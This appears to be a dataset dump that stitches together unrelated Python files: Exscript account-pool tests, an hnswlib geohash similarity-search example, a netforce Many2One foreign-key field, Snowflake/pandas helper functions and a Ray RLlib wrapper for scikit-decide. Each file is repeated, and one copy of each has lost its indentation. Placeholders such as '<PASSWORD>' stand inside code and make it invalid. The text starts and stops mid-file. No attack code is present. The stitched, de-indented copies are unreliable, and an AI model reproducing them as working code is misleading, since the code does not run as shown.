        self.assertNotIn(account2, pool.unlocked_accounts)
        pool.release_accounts('one')
        self.assertIn(account1, pool.unlocked_accounts)
        self.assertNotIn(account2, pool.unlocked_accounts)
        # Releasing an already-released owner must be a harmless no-op.
        pool.release_accounts('one')
        self.assertIn(account1, pool.unlocked_accounts)
        self.assertNotIn(account2, pool.unlocked_accounts)
        pool.release_accounts('two')
        self.assertIn(account1, pool.unlocked_accounts)
        self.assertIn(account2, pool.unlocked_accounts)
def suite():
    """Build the unittest suite for this module."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromTestCase(AccountPoolTest)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite()) | tests/Exscript/AccountPoolTest.py | from builtins import range
import sys
import unittest
import re
import os.path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
from Exscript import Account
from Exscript.account import AccountPool
from Exscript.util.file import get_accounts_from_file
class AccountPoolTest(unittest.TestCase):
CORRELATE = AccountPool
def setUp(self):
self.user1 = 'testuser1'
self.password1 = '<PASSWORD>'
self.account1 = Account(self.user1, self.password1)
self.user2 = 'testuser2'
self.password2 = '<PASSWORD>'
self.account2 = Account(self.user2, self.password2)
self.accm = AccountPool()
def testConstructor(self):
accm = AccountPool()
self.assertEqual(accm.n_accounts(), 0)
accm = AccountPool([self.account1, self.account2])
self.assertEqual(accm.n_accounts(), 2)
def testAddAccount(self):
self.assertEqual(self.accm.n_accounts(), 0)
self.accm.add_account(self.account1)
self.assertEqual(self.accm.n_accounts(), 1)
self.accm.add_account(self.account2)
self.assertEqual(self.accm.n_accounts(), 2)
def testReset(self):
self.testAddAccount()
self.accm.reset()
self.assertEqual(self.accm.n_accounts(), 0)
def testHasAccount(self):
self.assertEqual(self.accm.has_account(self.account1), False)
self.accm.add_account(self.account1)
self.assertEqual(self.accm.has_account(self.account1), True)
def testGetAccountFromHash(self):
account = Account('user', 'test')
thehash = account.__hash__()
self.accm.add_account(account)
self.assertEqual(self.accm.get_account_from_hash(thehash), account)
def testGetAccountFromName(self):
self.testAddAccount()
self.assertEqual(self.account2,
self.accm.get_account_from_name(self.user2))
def testNAccounts(self):
self.testAddAccount()
def testAcquireAccount(self):
self.testAddAccount()
self.accm.acquire_account(self.account1)
self.account1.release()
self.accm.acquire_account(self.account1)
self.account1.release()
# Add three more accounts.
filename = os.path.join(os.path.dirname(__file__), 'account_pool.cfg')
self.accm.add_account(get_accounts_from_file(filename))
self.assertEqual(self.accm.n_accounts(), 5)
for _ in range(2000):
# Each time an account is acquired a different one should be
# returned.
acquired = {}
for _ in range(5):
account = self.accm.acquire_account()
self.assertTrue(account is not None)
self.assertNotIn(account.get_name(), acquired)
acquired[account.get_name()] = account
# Release one account.
acquired['abc'].release()
# Acquire one account.
account = self.accm.acquire_account()
self.assertEqual(account.get_name(), 'abc')
# Release all accounts.
for account in list(acquired.values()):
account.release()
def testReleaseAccounts(self):
account1 = Account('foo')
account2 = Account('bar')
pool = AccountPool()
pool.add_account(account1)
pool.add_account(account2)
pool.acquire_account(account1, 'one')
pool.acquire_account(account2, 'two')
self.assertNotIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('one')
self.assertIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('one')
self.assertIn(account1, pool.unlocked_accounts)
self.assertNotIn(account2, pool.unlocked_accounts)
pool.release_accounts('two')
self.assertIn(account1, pool.unlocked_accounts)
self.assertIn(account2, pool.unlocked_accounts)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(AccountPoolTest)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite()) | 0.358802 | 0.271016 |
import numpy as np
import tqdm
import geohash
import hnswlib
import random
import sys
from collections import defaultdict
# Standard base-32 digits (0-9, a-v) in order.
base_alphabet = '0123456789abcdefghijklmnopqrstuv'
# The geohash base-32 alphabet (skips a, i, l, o), in the same positional order.
geo_alphabet = '0123456789bcdefghjkmnpqrstuvwxyz'
# Translation table mapping geohash characters onto standard base-32 digits,
# so a remapped geohash can be parsed directly with int(..., 32).
trantab = str.maketrans(geo_alphabet, base_alphabet)
def cosine_similarity(vector, matrix):
    """Cosine similarity between the single row ``vector`` and each row of ``matrix``."""
    dots = np.sum(vector * matrix, axis=1)
    row_norms = np.sqrt(np.sum(matrix ** 2, axis=1))
    vec_norm = np.sqrt(np.sum(vector ** 2))
    return dots / (row_norms * vec_norm)
# The library can only use int as a tag. So we need to convert geohash into integer first
def geohash2int(geo: str) -> int:
    """
    Converts geohash string into integer
    """
    # Remap geohash characters to standard base-32 digits, then parse.
    remapped = geo.translate(trantab)
    return int(remapped, 32)
def get_random_vector(dim):
    """Return one random float32 row vector of length ``dim``."""
    return np.random.random((1, dim)).astype(np.float32)
def get_random_point(from_lat, to_lat, from_lon, to_lon):
    """Draw a uniform random (lat, lon) pair inside the given bounding box."""
    return (
        random.uniform(from_lat, to_lat),
        random.uniform(from_lon, to_lon),
    )
def get_random_data(num_points, dim, from_lat, to_lat, from_lon, to_lon):
    """Generate ``num_points`` random feature vectors plus matching geo points."""
    vectors = np.random.rand(num_points, dim)
    coords = []
    for _ in range(num_points):
        coords.append(get_random_point(from_lat, to_lat, from_lon, to_lon))
    return vectors, coords
if __name__ == "__main__":
from_lat, to_lat = 52.4245, 52.6176
from_lon, to_lon = 13.1870, 13.5997
dim = 25
elements = 100_000
max_precision = 6 # Minimal searchable precision. Precision of 6 is ~ 0.61 km
# https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
hnsw = hnswlib.Index(space='cosine', dim=dim)
hnsw.init_index(max_elements = elements, M = 16, random_seed=45)
hnsw.set_num_threads(2)
# Generate random vectors and geo points
points, geo_points = get_random_data(elements, dim, from_lat, to_lat, from_lon, to_lon)
hnsw.add_items(points)
tags_to_index = defaultdict(int)
tags_to_ids = defaultdict(list)
# Collect geohashes for indexing
for idx, geo_point in enumerate(geo_points):
lat, lon = geo_point
ghsh = geohash.encode(lat, lon, precision=max_precision)
# List all hashes in hierarchy: 'u337jk' -> ['u', 'u3', 'u33', 'u337', 'u337j', 'u337jk']
tags = [ghsh[:i + 1] for i in range(max_precision)]
# Save small geohash indexes with further indexing
tags_to_index[ghsh[:max_precision]] += 1
tags_to_index[ghsh[:max_precision - 1]] += 1
# Assign geotags to points
for tag in tags:
tags_to_ids[tag].append(idx)
hnsw.add_tags([idx], geohash2int(tag))
# Additionally index points inside small regions
for tag in tqdm.tqdm(tags_to_index):
# This will create additional links in a graph for each geohash region.
# So search should work on nodes inside this region only.
hnsw.index_tagged(geohash2int(tag))
# With M=16 additional indexing is only required for regions containing less than ~5% of all points
# Additional info here: https://comprehension.ml/posts/categorical-hnsw/
for tag in tqdm.tqdm(tags_to_index):
# This code will also create additional connections between points in neighbor regions.
# So search in multiple neighbor regions will also work
neighbors = [geohash2int(ntag) for ntag in geohash.neighbors(tag) if ntag in tags_to_index]
hnsw.index_cross_tagged(neighbors)
# Performing query
target_query = get_random_vector(dim)
# Hash precision defines radius of a seearch. Precision of 5 is ~ 2.4Km
# https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
target_precision = 5
target_lat, target_lon = 52.5175, 13.3937
# Generate integer tag from geohash
target_ghsh = geohash.encode(target_lat, target_lon, precision=target_precision)
target_tag = geohash2int(target_ghsh)
# Obtain search condition from geohash
# You can also search in multiple squares with conjunction:
# [[(False, hash1), (False, hash2), ..., (False, hashN)]]
condition = [[(False, target_tag)]]
found, dist = hnsw.knn_query(target_query, k=3, conditions=condition)
print(found, dist)
# Check search precision with brutforce approach
true_distance = 1 - cosine_similarity(target_query, points)
mask = np.zeros(elements, dtype=bool)
mask[tags_to_ids[target_ghsh]] = True # Search in given geo-region only
np.putmask(true_distance, ~mask, 1_000_000)
closest = list(np.argsort(true_distance)) # Closest by mask
print(closest[:3], true_distance[closest[:3]]) | examples/geo_example.py | import numpy as np
import tqdm
import geohash
import hnswlib
import random
import sys
from collections import defaultdict
base_alphabet = '0123456789abcdefghijklmnopqrstuv'
geo_alphabet = '0123456789bcdefghjkmnpqrstuvwxyz'
trantab = str.maketrans(geo_alphabet, base_alphabet)
def cosine_similarity(vector, matrix):
    """Cosine similarity between a single row vector and every row of a matrix."""
    dots = np.sum(vector * matrix, axis=1)
    row_norms = np.sqrt(np.sum(matrix ** 2, axis=1))
    vec_norm = np.sqrt(np.sum(vector ** 2))
    return dots / (row_norms * vec_norm)
# The library can only use int as a tag. So we need to convert geohash into integer first
def geohash2int(geo: str) -> int:
    """Convert a geohash string into an integer (hnswlib tags must be ints)."""
    # Remap the geohash alphabet onto standard base-32 digits, then parse.
    remapped = geo.translate(trantab)
    return int(remapped, 32)
def get_random_vector(dim):
    """Return one uniform random float32 vector of shape (1, dim)."""
    return np.random.random((1, dim)).astype(np.float32)
def get_random_point(from_lat, to_lat, from_lon, to_lon):
    """Draw one (lat, lon) pair uniformly from the given bounding box."""
    return (random.uniform(from_lat, to_lat),
            random.uniform(from_lon, to_lon))
def get_random_data(num_points, dim, from_lat, to_lat, from_lon, to_lon):
    """Generate num_points random feature vectors plus matching geo coordinates."""
    vectors = np.random.rand(num_points, dim)
    coords = [get_random_point(from_lat, to_lat, from_lon, to_lon)
              for _ in range(num_points)]
    return vectors, coords
if __name__ == "__main__":
    # Bounding box roughly covering Berlin.
    from_lat, to_lat = 52.4245, 52.6176
    from_lon, to_lon = 13.1870, 13.5997
    dim = 25
    elements = 100_000
    max_precision = 6  # Minimal searchable precision. Precision of 6 is ~ 0.61 km
    # https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
    hnsw = hnswlib.Index(space='cosine', dim=dim)
    hnsw.init_index(max_elements = elements, M = 16, random_seed=45)
    hnsw.set_num_threads(2)
    # Generate random vectors and geo points
    points, geo_points = get_random_data(elements, dim, from_lat, to_lat, from_lon, to_lon)
    hnsw.add_items(points)
    tags_to_index = defaultdict(int)
    tags_to_ids = defaultdict(list)
    # Collect geohashes for indexing
    for idx, geo_point in enumerate(geo_points):
        lat, lon = geo_point
        ghsh = geohash.encode(lat, lon, precision=max_precision)
        # List all hashes in hierarchy: 'u337jk' -> ['u', 'u3', 'u33', 'u337', 'u337j', 'u337jk']
        tags = [ghsh[:i + 1] for i in range(max_precision)]
        # Save small geohash indexes with further indexing
        tags_to_index[ghsh[:max_precision]] += 1
        tags_to_index[ghsh[:max_precision - 1]] += 1
        # Assign geotags to points
        for tag in tags:
            tags_to_ids[tag].append(idx)
            hnsw.add_tags([idx], geohash2int(tag))
    # Additionally index points inside small regions
    for tag in tqdm.tqdm(tags_to_index):
        # This will create additional links in a graph for each geohash region.
        # So search should work on nodes inside this region only.
        hnsw.index_tagged(geohash2int(tag))
    # With M=16 additional indexing is only required for regions containing less than ~5% of all points
    # Additional info here: https://comprehension.ml/posts/categorical-hnsw/
    for tag in tqdm.tqdm(tags_to_index):
        # This code will also create additional connections between points in neighbor regions.
        # So search in multiple neighbor regions will also work
        neighbors = [geohash2int(ntag) for ntag in geohash.neighbors(tag) if ntag in tags_to_index]
        hnsw.index_cross_tagged(neighbors)
    # Performing query
    target_query = get_random_vector(dim)
    # Hash precision defines radius of a search. Precision of 5 is ~ 2.4Km
    # https://en.wikipedia.org/wiki/Geohash#Number_of_geohash_characters_and_precision_in_km
    target_precision = 5
    target_lat, target_lon = 52.5175, 13.3937
    # Generate integer tag from geohash
    target_ghsh = geohash.encode(target_lat, target_lon, precision=target_precision)
    target_tag = geohash2int(target_ghsh)
    # Obtain search condition from geohash
    # You can also search in multiple squares with conjunction:
    # [[(False, hash1), (False, hash2), ..., (False, hashN)]]
    condition = [[(False, target_tag)]]
    found, dist = hnsw.knn_query(target_query, k=3, conditions=condition)
    print(found, dist)
    # Check search precision with brute-force approach
    true_distance = 1 - cosine_similarity(target_query, points)
    mask = np.zeros(elements, dtype=bool)
    mask[tags_to_ids[target_ghsh]] = True  # Search in given geo-region only
    np.putmask(true_distance, ~mask, 1_000_000)
    closest = list(np.argsort(true_distance))  # Closest by mask
    # Fixed: final line was corrupted by extraction artifacts fused onto it.
    print(closest[:3], true_distance[closest[:3]])
from .field import Field
from netforce import database
import netforce.model
class Many2One(Field):
    """Many-to-one relation field, stored as an integer FK column.

    Keeps the matching PostgreSQL foreign-key constraint in sync:
    created if missing, dropped and re-created when the referenced
    table or the ON DELETE rule changed.
    """

    def __init__(self, relation, string, condition=None, on_delete=None, **kw):
        super(Many2One, self).__init__(string=string, index=True, **kw)
        # Default referential action matches a nullable FK column.
        self.on_delete = on_delete or "set_null"
        self.relation = relation
        self.condition = condition
        if self.store:
            self.eager_load = True

    def update_db(self):
        """Create or update the foreign-key constraint backing this field."""
        super(Many2One, self).update_db()
        m = netforce.model.get_model(self.model)
        if not m._table or not self.store:
            return
        db = database.get_connection()
        schema = database.get_active_schema() or "public"
        fkname = m._table + "_" + self.name + "_fk"
        # Map the field option to pg_constraint.confdeltype and to SQL syntax.
        if self.on_delete == "restrict":
            delete_rule = "r"
            on_delete_sql = "RESTRICT"
        elif self.on_delete == "no_action":
            delete_rule = "a"
            on_delete_sql = "NO ACTION"  # was "NO_ACTION": invalid PostgreSQL syntax
        elif self.on_delete == "cascade":
            delete_rule = "c"
            on_delete_sql = "CASCADE"
        elif self.on_delete == "set_null":
            delete_rule = "n"
            on_delete_sql = "SET NULL"
        elif self.on_delete == "set_default":
            delete_rule = "d"
            on_delete_sql = "SET DEFAULT"
        else:
            raise Exception("Invalid on_delete on %s.%s (%s)" % (m._name, self.name, self.on_delete))
        mr = netforce.model.get_model(self.relation)
        if not mr:
            raise Exception("Relation model '%s' does not exist" % self.relation)
        drop_fk = False
        add_fk = False
        # Look up the existing constraint (if any) with its delete rule and target table.
        res = db.get(
            "SELECT r.relname,c.confdeltype FROM pg_constraint c,pg_class r JOIN pg_catalog.pg_namespace n ON n.oid=r.relnamespace WHERE c.conname=%s AND r.oid=c.confrelid AND n.nspname=%s", fkname, schema)
        if not res:
            print("adding foreign key %s.%s" % (self.model, self.name))
            drop_fk = False
            add_fk = True
        else:
            # Re-create the constraint when the delete rule or target table differs.
            if res.confdeltype != delete_rule or res.relname != mr._table:
                print("changing foreign key %s.%s" % (self.model, self.name))
                print("  delete_rule: %s -> %s" % (res.confdeltype, delete_rule))
                print("  relation: %s -> %s" % (res.relname, mr._table))
                drop_fk = True
                add_fk = True
        if drop_fk:
            db.execute("ALTER TABLE %s DROP CONSTRAINT %s" % (m._table, fkname))
        if add_fk:
            q = "ALTER TABLE %s ADD CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s (id)" % (
                m._table, fkname, self.name, mr._table)
            if self.on_delete:
                q += " ON DELETE %s" % on_delete_sql
            print(q)
            db.execute(q)

    def get_col_type(self):
        """SQL column type backing this field (integer id of the related record)."""
        return "int4"

    def get_meta(self, context={}):
        # NOTE: the shared dict default is safe only because it is never mutated.
        vals = super(Many2One, self).get_meta(context=context)
        vals["type"] = "many2one"
        vals["relation"] = self.relation
        return vals
from .field import Field
from netforce import database
import netforce.model
class Many2One(Field):
def __init__(self, relation, string, condition=None, on_delete=None, **kw):
super(Many2One, self).__init__(string=string, index=True, **kw)
self.on_delete = on_delete or "set_null"
self.relation = relation
self.condition = condition
if self.store:
self.eager_load = True
def update_db(self):
super(Many2One, self).update_db()
m = netforce.model.get_model(self.model)
if not m._table or not self.store:
return
db = database.get_connection()
schema = database.get_active_schema() or "public"
fkname = m._table + "_" + self.name + "_fk"
if self.on_delete == "restrict":
delete_rule = "r"
on_delete_sql = "RESTRICT"
elif self.on_delete == "no_action":
delete_rule = "a"
on_delete_sql = "NO_ACTION"
elif self.on_delete == "cascade":
delete_rule = "c"
on_delete_sql = "CASCADE"
elif self.on_delete == "set_null":
delete_rule = "n"
on_delete_sql = "SET NULL"
elif self.on_delete == "set_default":
delete_rule = "d"
on_delete_sql = "SET DEFAULT"
else:
raise Exception("Invalid on_delete on %s.%s (%s)" % (m._name, self.name, self.on_delete))
mr = netforce.model.get_model(self.relation)
if not mr:
raise Exception("Relation model '%s' does not exist" % self.relation)
drop_fk = False
add_fk = False
res = db.get(
"SELECT r.relname,c.confdeltype FROM pg_constraint c,pg_class r JOIN pg_catalog.pg_namespace n ON n.oid=r.relnamespace WHERE c.conname=%s AND r.oid=c.confrelid AND n.nspname=%s", fkname, schema)
if not res:
print("adding foreign key %s.%s" % (self.model, self.name))
drop_fk = False
add_fk = True
else:
if res.confdeltype != delete_rule or res.relname != mr._table:
print("changing foreign key %s.%s" % (self.model, self.name))
print(" delete_rule: %s -> %s" % (res.confdeltype, delete_rule))
print(" relation: %s -> %s" % (res.relname, mr._table))
drop_fk = True
add_fk = True
if drop_fk:
db.execute("ALTER TABLE %s DROP CONSTRAINT %s" % (m._table, fkname))
if add_fk:
q = "ALTER TABLE %s ADD CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s (id)" % (
m._table, fkname, self.name, mr._table)
if self.on_delete:
q += " ON DELETE %s" % on_delete_sql
print(q)
db.execute(q)
def get_col_type(self):
return "int4"
def get_meta(self, context={}):
vals = super(Many2One, self).get_meta(context=context)
vals["type"] = "many2one"
vals["relation"] = self.relation
return vals | 0.482429 | 0.077239 |
VERSION = "20210720 2217 "
import datetime
import humanize
import numpy as np
import os
import pandas as pd
import plotly.express as px
import pyperclip
import re
import sidetable
import snowflake.connector
import time
from snowflake.connector.pandas_tools import write_pandas
from dotenv import load_dotenv
_ = load_dotenv()
# Get non-null counts
pd.options.display.max_info_rows = 16907850
# Snowflake connection, configured entirely from environment variables
# (loaded above via python-dotenv).
conn = snowflake.connector.connect(
    user=os.getenv('user'),
    password=os.getenv('password'),  # was a redacted "<PASSWORD>" placeholder (syntax error); restore env lookup
    account=os.getenv('account'),
    warehouse=os.getenv('warehouse'),
    database=os.getenv('database'),
    schema=os.getenv('schema')
)
# Cursor shared by the query()/execute() helpers below.
cur = conn.cursor()
def compare_sets(list1, list2):
    """Tabulate the overlap of two collections A and B.

    Returns a DataFrame with raw counts and percentages for elements
    in A, in B, only in B ("NOT IN A") and only in A ("NOT IN B").
    """
    a = set(list1)
    b = set(list2)
    both = b.intersection(a)
    n_a, n_b, n_both = len(a), len(b), len(both)
    only_a = len(a - b)
    only_b = len(b - a)
    rows = {
        'IN A': [n_a, n_both, round(n_a / n_a * 100, 1), round(n_both / n_b * 100, 1)],
        'IN B': [n_both, n_b, round(n_both / n_a * 100, 1), round(n_b / n_b * 100, 1)],
        'NOT IN A': [0, only_b, 0, round(only_b / n_b * 100, 1)],
        'NOT IN B': [only_a, 0, round(only_a / n_a * 100, 1), 0],
    }
    return pd.DataFrame.from_dict(rows, orient='index',
                                  columns=['A', 'B', '% of A', '% of B'])
def d(vars):
    """List variables named like df/df1/df2... in descending numeric order.

    Usage: d(dir())
    @vars list of names, e.g. the output of dir()
    """
    candidates = [name for name in vars
                  if name.find('df') == 0 and '_' not in name and name != 'dfs']

    def _num(name):
        # 'df12' -> 12; bare 'df' sorts last with key 0.
        return int(re.sub("[^0-9]", "", name.replace('df', ''))) if len(name) > 2 else 0

    candidates.sort(key=_num, reverse=True)
    return candidates
def e(start_time):
    """Print the current time and a human-readable delta since start_time.

    @start_time a time.monotonic() value to compare against now
    """
    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
    print(f'Time now: {now}')
    elapsed = time.monotonic() - start_time
    print(f"Time since start: {humanize.naturaldelta(elapsed)}")
def execute(sql):
    """Execute a SQL command on the shared cursor, printing elapsed time."""
    started = time.monotonic()
    _ = cur.execute(sql)
    elapsed = time.monotonic() - started
    print(f"Elapsed time {elapsed:.2f}")
    return
def find_col_with(df, char_to_find):
    """Return the positional index of the first column whose name contains char_to_find.

    @char_to_find substring to search for in column names
    """
    matches = [col for col in df.columns if char_to_find in col]
    return list(df.columns).index(matches[0])
def find_max_order(df, start_col=1):
    """Order columns from start_col onward by their maximum value, descending.

    @start_col index of the first data column (column 0 is usually a date/label)
    """
    maxima = df[df.columns[start_col:]].max()
    return list(maxima.sort_values(ascending=False).keys())
def find_percentage_total(df, start_col=1):
    """Append a 'total' column plus percent-of-total columns to df (in place).

    @start_col index of the first numeric column (column 0 is usually a date/label)
    """
    n_cols = len(df.columns)
    running_total = pd.Series(data=np.zeros(len(df)))
    for col_idx in range(start_col, n_cols):
        running_total += df.iloc[:, col_idx]
    df.insert(len(df.columns), 'total', running_total)
    # The range deliberately includes the freshly added 'total' column,
    # which yields a constant 100% "total %" column.
    for col_idx in range(start_col, n_cols + 1):
        share = round((df.iloc[:, col_idx] / running_total) * 100, 2)
        df.insert(len(df.columns), f"{df.columns[col_idx]} %", share)
    return df
def query(sql):
    """Run a SQL query on the shared cursor and return the result as a DataFrame."""
    started = time.monotonic()
    _ = cur.execute(sql)
    frame = cur.fetch_pandas_all()
    elapsed = time.monotonic() - started
    print(f"Elapsed time {elapsed:.2f}")
    return frame
def t(title_string):
    """Append "as at {today}" to a title, print it and copy it to the clipboard.

    @title_string text to preceed the "as at" part
    """
    stamp = datetime.datetime.today().strftime('%d %b %Y')
    full_title = f"{title_string} as at {stamp}"
    print(full_title)
    pyperclip.copy(full_title)
    print("(now on clipboard)")
    return full_title
start_time = time.monotonic()
print(f"Setup Complete v {VERSION}")
VERSION = "20210720 2217 "
import datetime
import humanize
import numpy as np
import os
import pandas as pd
import plotly.express as px
import pyperclip
import re
import sidetable
import snowflake.connector
import time
from snowflake.connector.pandas_tools import write_pandas
from dotenv import load_dotenv
_ = load_dotenv()
# Get non-null counts
pd.options.display.max_info_rows = 16907850
# Connection string
conn = snowflake.connector.connect(
user=os.getenv('user'),
password=<PASSWORD>('password'),
account=os.getenv('account'),
warehouse=os.getenv('warehouse'),
database=os.getenv('database'),
schema=os.getenv('schema')
)
# Execute a statement that will generate a result set.
cur = conn.cursor()
def compare_sets(list1, list2):
"""Make a count of the intersections of two sets, A and B"""
set1 = set(list1)
set2 = set(list2)
set2_intersection_set1 = set2.intersection(set1)
result = {'IN A':[len(set1), len(set2_intersection_set1), round(len(set1)/len(set1)*100,1), round(len(set2_intersection_set1)/len(set2)*100,1)]}
result['IN B'] = [len(set2_intersection_set1), len(set2), round(len(set2_intersection_set1)/len(set1)*100,1), round(len(set2)/len(set2)*100,1)]
result['NOT IN A'] = [0, len(set2 - set1), 0, round(len(set2 - set1)/len(set2)*100,1)]
result['NOT IN B'] = [len(set1 - set2), 0, round(len(set1 - set2)/len(set1)*100,1), 0]
df = pd.DataFrame.from_dict(result, orient='index', columns=['A', 'B', '% of A', '% of B'])
return df
def d(vars):
"""List of variables starting with string "df" in reverse order. Usage: d(dir())
@vars list of variables output by dir() command
"""
list_of_dfs = [item for item in vars if (item.find('df') == 0 and item.find('_') == -1 and item != 'dfs')]
list_of_dfs.sort(key=lambda x:int(re.sub("[^0-9]", "", x.replace('df',''))) if len(x) > 2 else 0, reverse=True)
return list_of_dfs
def e(start_time):
"""Return human readable time delta
@start_time time to compare to current time
"""
print(f'Time now: {datetime.datetime.now().strftime("%Y-%m-%d %H:%M")}')
print(f"Time since start: {humanize.naturaldelta(time.monotonic() - start_time)}")
def execute(sql):
"""Execute a SQL command"""
start_time = time.monotonic()
_ = cur.execute(sql)
end_time = time.monotonic()
elapsed = end_time - start_time
print(f"Elapsed time {elapsed:.2f}")
return
def find_col_with(df, char_to_find):
"""Return column index of first column containing char_to_find
@char_to_find character to search for in column name
"""
first_column_with_char_to_find = [col for col in df.columns if col.find(char_to_find) > -1][0]
return list(df.columns).index(first_column_with_char_to_find)
def find_max_order(df, start_col=1):
"""Find the max value in each column and use it to put columns in rank order
@start_col Index of starting column (typically 1 as first column -- column 0 -- is a date or label)
"""
return list(df[df.columns[start_col:]].max().sort_values(ascending=False).keys())
def find_percentage_total(df, start_col=1):
"""Find total and percent of total for columns of Pandas dataframe
@start_col Index of starting column (typically 1 as first column -- column 0 -- is a date or label)
"""
# Get values for col1,col2 and col3
total = pd.Series(data=np.zeros(len(df)))
col_count = len(df.columns)
for i in range(start_col, col_count):
total += df.iloc[:,i]
df.insert(len(df.columns), 'total', total)
for i in range(start_col, col_count + 1):
pct_of_total = round((df.iloc[:,i]/total)*100, 2)
# Create Pandas DF with new column of pct_of_total
df.insert(len(df.columns),f"{df.columns[i]} %", pct_of_total)
# Pull original dataframe to show total and %
return df
def query(sql):
"""Run a SQL query and fetch result into Pandas DataFrame"""
start_time = time.monotonic()
_ = cur.execute(sql)
df = cur.fetch_pandas_all()
end_time = time.monotonic()
elapsed = end_time - start_time
print(f"Elapsed time {elapsed:.2f}")
return df
def t(title_string):
"""Add "as at {today}" to title. Usage: t(title_sting)
@title_string text to preceed the "as at" part
"""
today = datetime.datetime.today().strftime('%d %b %Y')
title = f"{title_string} as at {today}"
print(title)
pyperclip.copy(title)
print("(now on clipboard)")
return title
start_time = time.monotonic()
print(f"Setup Complete v {VERSION}") | 0.474144 | 0.2438 |
from __future__ import annotations
import glob
import os
from typing import Callable, Dict, Optional, Type
import ray
from ray.rllib.agents.trainer import Trainer
from ray.rllib.env.multi_agent_env import MultiAgentEnv
from ray.tune.registry import register_env
from skdecide import Domain, Solver
from skdecide.builders.domain import (
Initializable,
Sequential,
SingleAgent,
UnrestrictedActions,
)
from skdecide.builders.solver import Policies, Restorable
from skdecide.hub.space.gym import GymSpace
# TODO: remove UnrestrictedActions?
class D(Domain, Sequential, UnrestrictedActions, Initializable):
    """Domain characteristics this solver requires (used as RayRLlib.T_domain)."""
    pass
class RayRLlib(Solver, Policies, Restorable):
    """This class wraps a Ray RLlib solver (ray[rllib]) as a scikit-decide solver.

    !!! warning
        Using this class requires Ray RLlib to be installed.
    """

    T_domain = D

    def __init__(
        self,
        algo_class: Type[Trainer],
        train_iterations: int,
        config: Optional[Dict] = None,
        policy_configs: Dict[str, Dict] = {"policy": {}},
        policy_mapping_fn: Callable[[str], str] = lambda agent_id: "policy",
    ) -> None:
        """Initialize Ray RLlib.

        # Parameters
        algo_class: The class of Ray RLlib trainer/agent to wrap.
        train_iterations: The number of iterations to call the trainer's train() method.
        config: The configuration dictionary for the trainer.
        policy_configs: The mapping from policy id (str) to additional config (dict) (leave default for single policy).
        policy_mapping_fn: The function mapping agent ids to policy ids (leave default for single policy).
        """
        self._algo_class = algo_class
        self._train_iterations = train_iterations
        self._config = config or {}
        # NOTE(review): the dict defaults above are shared across instances;
        # safe only while callers never mutate them — confirm.
        self._policy_configs = policy_configs
        self._policy_mapping_fn = policy_mapping_fn
        # ignore_reinit_error makes repeated solver construction safe in one process.
        ray.init(ignore_reinit_error=True)

    @classmethod
    def _check_domain_additional(cls, domain: Domain) -> bool:
        """Check that every agent's action and observation space is a GymSpace."""
        if isinstance(domain, SingleAgent):
            return isinstance(domain.get_action_space(), GymSpace) and isinstance(
                domain.get_observation_space(), GymSpace
            )
        else:
            return all(
                isinstance(a, GymSpace) for a in domain.get_action_space().values()
            ) and all(
                isinstance(o, GymSpace) for o in domain.get_observation_space().values()
            )

    def _solve_domain(self, domain_factory: Callable[[], D]) -> None:
        """Train the wrapped RLlib trainer for the configured number of iterations."""
        # Reuse algo if possible (enables further learning)
        if not hasattr(self, "_algo"):
            self._init_algo(domain_factory)

        # Training loop
        for _ in range(self._train_iterations):
            self._algo.train()

    def _sample_action(
        self, observation: D.T_agent[D.T_observation]
    ) -> D.T_agent[D.T_concurrency[D.T_event]]:
        """Compute one action per agent via that agent's mapped policy."""
        action = {
            k: self._algo.compute_action(
                self._unwrap_obs(v, k), policy_id=self._policy_mapping_fn(k)
            )
            for k, v in observation.items()
        }
        return self._wrap_action(action)

    def _is_policy_defined_for(self, observation: D.T_agent[D.T_observation]) -> bool:
        # RLlib policies are defined for any observation once trained.
        return True

    def _save(self, path: str) -> None:
        """Save a trainer checkpoint under *path*."""
        self._algo.save(path)

    def _load(self, path: str, domain_factory: Callable[[], D]):
        """Restore a trainer checkpoint; *path* may be a checkpoint file or a directory."""
        if not os.path.isfile(path):
            # Find latest checkpoint by creation time of its .tune_metadata file.
            metadata_files = glob.glob(f"{path}/**/*.tune_metadata")
            latest_metadata_file = max(metadata_files, key=os.path.getctime)
            path = latest_metadata_file[: -len(".tune_metadata")]
        self._init_algo(domain_factory)
        self._algo.restore(path)

    def _init_algo(self, domain_factory: Callable[[], D]):
        """Build the RLlib trainer plus the (un)wrapping lambdas bridging both APIs."""
        domain = domain_factory()
        # Convert between raw Gym values and scikit-decide space elements.
        self._wrap_action = lambda a: {
            k: next(iter(domain.get_action_space()[k].from_unwrapped([v])))
            for k, v in a.items()
        }
        self._unwrap_obs = lambda o, agent: next(
            iter(domain.get_observation_space()[agent].to_unwrapped([o]))
        )
        # Overwrite multi-agent config
        pol_obs_spaces = {
            self._policy_mapping_fn(k): v.unwrapped()
            for k, v in domain.get_observation_space().items()
        }
        pol_act_spaces = {
            self._policy_mapping_fn(k): v.unwrapped()
            for k, v in domain.get_action_space().items()
        }
        policies = {
            k: (None, pol_obs_spaces[k], pol_act_spaces[k], v or {})
            for k, v in self._policy_configs.items()
        }
        self._config["multiagent"] = {
            "policies": policies,
            "policy_mapping_fn": self._policy_mapping_fn,
        }

        # Instanciate algo
        register_env("skdecide_env", lambda _: AsRLlibMultiAgentEnv(domain_factory()))
        self._algo = self._algo_class(env="skdecide_env", config=self._config)
class AsRLlibMultiAgentEnv(MultiAgentEnv):
    """Adapter exposing a scikit-decide domain as a Ray RLlib MultiAgentEnv."""

    def __init__(self, domain: D) -> None:
        """Initialize AsRLlibMultiAgentEnv.

        # Parameters
        domain: The scikit-decide domain to wrap as a RLlib multi-agent environment.
        """
        self._domain = domain

    def reset(self):
